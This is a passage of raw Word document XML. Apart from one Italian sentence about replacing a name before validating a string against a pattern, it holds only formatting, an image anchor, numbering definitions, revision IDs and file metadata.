        <w:t>bisogna fare il replace del name prima di validare la stringa col pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B2F2F" w14:textId="17E6040A" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4E28381E" w14:textId="4F90D0F5" w:rsidR="005F7CDE" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5517055B" wp14:editId="01AD209F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-295275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5764928" cy="4091940"/>
            <wp:effectExtent l="0" t="0" r="762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4928" cy="4091940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C915BE3" w14:textId="295C28AA" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="57566D7C" w14:textId="05C652A2" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5545157F" w14:textId="5AF0749E" w:rsidR="005F7CDE" w:rsidRDefault="005F7CDE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="51C2ED48" w14:textId="5F171254"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64FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E146B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B6C2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18A27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6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="491485382">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1376348713">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1448045462">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1764914002">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="830296275">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="888420362">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1752501418">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="432366485">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1806116682">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1988893786">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="18109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6778F"/>
    <w:rsid w:val="00071E32"/>
    <w:rsid w:val="00072AFB"/>
    <w:rsid w:val="00093E39"/>
    <w:rsid w:val="000B2D9C"/>
    <w:rsid w:val="000E1CCE"/>
    <w:rsid w:val="000F2421"/>
    <w:rsid w:val="000F4F60"/>
    <w:rsid w:val="00124628"/>
    <w:rsid w:val="00140DA2"/>
    <w:rsid w:val="00171715"/>
    <w:rsid w:val="00185FB3"/>
    <w:rsid w:val="00197C79"/>
    <w:rsid w:val="001A56AB"/>
    <w:rsid w:val="001A57CF"/>
    <w:rsid w:val="001B4E1A"/>
    <w:rsid w:val="001C7EE3"/>
    <w:rsid w:val="001D2095"/>
    <w:rsid w:val="00242251"/>
    <w:rsid w:val="00245DF3"/>
    <w:rsid w:val="0026401D"/>
    <w:rsid w:val="002666AE"/>
    <w:rsid w:val="00270956"/>
    <w:rsid w:val="00281830"/>
    <w:rsid w:val="002912F7"/>
    <w:rsid w:val="00296FF5"/>
    <w:rsid w:val="002A0868"/>
    <w:rsid w:val="002D1426"/>
    <w:rsid w:val="002F1920"/>
    <w:rsid w:val="002F292A"/>
    <w:rsid w:val="003022AA"/>
    <w:rsid w:val="0031586D"/>
    <w:rsid w:val="00335218"/>
    <w:rsid w:val="00350230"/>
    <w:rsid w:val="00350E38"/>
    <w:rsid w:val="003620AB"/>
    <w:rsid w:val="00370316"/>
    <w:rsid w:val="00370730"/>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D43F9"/>
    <w:rsid w:val="004E2F86"/>
    <w:rsid w:val="004E3997"/>
    <w:rsid w:val="004E4997"/>
    <w:rsid w:val="00510D75"/>
    <w:rsid w:val="005333DB"/>
    <w:rsid w:val="0053542A"/>
    <w:rsid w:val="00553627"/>
    <w:rsid w:val="00573261"/>
    <w:rsid w:val="00576284"/>
    <w:rsid w:val="005A6F04"/>
    <w:rsid w:val="005B284B"/>
    <w:rsid w:val="005B48C7"/>
    <w:rsid w:val="005D6BD8"/>
    <w:rsid w:val="005D725F"/>
    <w:rsid w:val="005E267F"/>
    <w:rsid w:val="005E4094"/>
    <w:rsid w:val="005E7293"/>
    <w:rsid w:val="005F7CDE"/>
    <w:rsid w:val="00617F11"/>
    <w:rsid w:val="00631FB1"/>
    <w:rsid w:val="00655E59"/>
    <w:rsid w:val="00674FEC"/>
    <w:rsid w:val="00681873"/>
    <w:rsid w:val="006A185C"/>
    <w:rsid w:val="006A2C81"/>
    <w:rsid w:val="006B3EEC"/>
    <w:rsid w:val="006C2D8D"/>
    <w:rsid w:val="006D5B67"/>
    <w:rsid w:val="006F4082"/>
    <w:rsid w:val="007019BC"/>
    <w:rsid w:val="007134C2"/>
    <w:rsid w:val="007424E1"/>
    <w:rsid w:val="00747D31"/>
    <w:rsid w:val="0076032B"/>
    <w:rsid w:val="00791AF1"/>
    <w:rsid w:val="00792C82"/>
    <w:rsid w:val="007A3300"/>
    <w:rsid w:val="007B1CF1"/>
    <w:rsid w:val="007C5F43"/>
    <w:rsid w:val="007D3F5D"/>
    <w:rsid w:val="007F2270"/>
    <w:rsid w:val="00816871"/>
    <w:rsid w:val="00825307"/>
    <w:rsid w:val="008302E7"/>
    <w:rsid w:val="00844BCD"/>
    <w:rsid w:val="00851F35"/>
    <w:rsid w:val="008568AE"/>
    <w:rsid w:val="00861705"/>
    <w:rsid w:val="00872EF7"/>
    <w:rsid w:val="0088250F"/>
    <w:rsid w:val="008B0B12"/>
    <w:rsid w:val="008B6F6D"/>
    <w:rsid w:val="009015E9"/>
    <w:rsid w:val="009036AA"/>
    <w:rsid w:val="0091567C"/>
    <w:rsid w:val="00922898"/>
    <w:rsid w:val="00926F16"/>
    <w:rsid w:val="009769CB"/>
    <w:rsid w:val="00987816"/>
    <w:rsid w:val="0098788D"/>
    <w:rsid w:val="00992E84"/>
    <w:rsid w:val="009A1CD7"/>
    <w:rsid w:val="009B3431"/>
    <w:rsid w:val="009C266A"/>
    <w:rsid w:val="009D152E"/>
    <w:rsid w:val="00A2084F"/>
    <w:rsid w:val="00A257E3"/>
    <w:rsid w:val="00A31A32"/>
    <w:rsid w:val="00A54E4E"/>
    <w:rsid w:val="00A74318"/>
    <w:rsid w:val="00A83B5D"/>
    <w:rsid w:val="00AA4F9B"/>
    <w:rsid w:val="00AB3362"/>
    <w:rsid w:val="00AC599E"/>
    <w:rsid w:val="00AD3339"/>
    <w:rsid w:val="00AF5966"/>
    <w:rsid w:val="00AF6513"/>
    <w:rsid w:val="00B019CE"/>
    <w:rsid w:val="00B04DA2"/>
    <w:rsid w:val="00B11AA2"/>
    <w:rsid w:val="00B508DA"/>
    <w:rsid w:val="00B63358"/>
    <w:rsid w:val="00BB112C"/>
    <w:rsid w:val="00BC247B"/>
    <w:rsid w:val="00BD03FB"/>
    <w:rsid w:val="00BE15A3"/>
    <w:rsid w:val="00BF4ABA"/>
    <w:rsid w:val="00C079D4"/>
    <w:rsid w:val="00C262C3"/>
    <w:rsid w:val="00C30321"/>
    <w:rsid w:val="00C36FFB"/>
    <w:rsid w:val="00C46E60"/>
    <w:rsid w:val="00C50370"/>
    <w:rsid w:val="00C53E14"/>
    <w:rsid w:val="00C56823"/>
    <w:rsid w:val="00C64892"/>
    <w:rsid w:val="00C82F57"/>
    <w:rsid w:val="00C87C03"/>
    <w:rsid w:val="00CA09AC"/>
    <w:rsid w:val="00CC03BC"/>
    <w:rsid w:val="00CC23BE"/>
    <w:rsid w:val="00CE1B39"/>
    <w:rsid w:val="00CE3F28"/>
    <w:rsid w:val="00D03FA6"/>
    <w:rsid w:val="00D12C9A"/>
    <w:rsid w:val="00D22103"/>
    <w:rsid w:val="00D72C3C"/>
    <w:rsid w:val="00D83D81"/>
    <w:rsid w:val="00D95D77"/>
    <w:rsid w:val="00D97650"/>
    <w:rsid w:val="00DA7D75"/>
    <w:rsid w:val="00DE1106"/>
    <w:rsid w:val="00DE4795"/>
    <w:rsid w:val="00DE7E9C"/>
    <w:rsid w:val="00E16865"/>
    <w:rsid w:val="00E464AA"/>
    <w:rsid w:val="00EB78A7"/>
    <w:rsid w:val="00ED7083"/>
    <w:rsid w:val="00EF10FE"/>
    <w:rsid w:val="00F04F57"/>
    <w:rsid w:val="00F13DB4"/>
    <w:rsid w:val="00F35257"/>
    <w:rsid w:val="00F52417"/>
    <w:rsid w:val="00F56083"/>
    <w:rsid w:val="00FA683C"/>
    <w:rsid w:val="00FC6340"/>
    <w:rsid w:val="00FC6F6C"/>
    <w:rsid w:val="00FD3A3A"/>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082"/>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0677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test"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8</Pages>
  <Words>3645</Words>
  <Characters>2077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34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-10T15:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-31T15:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>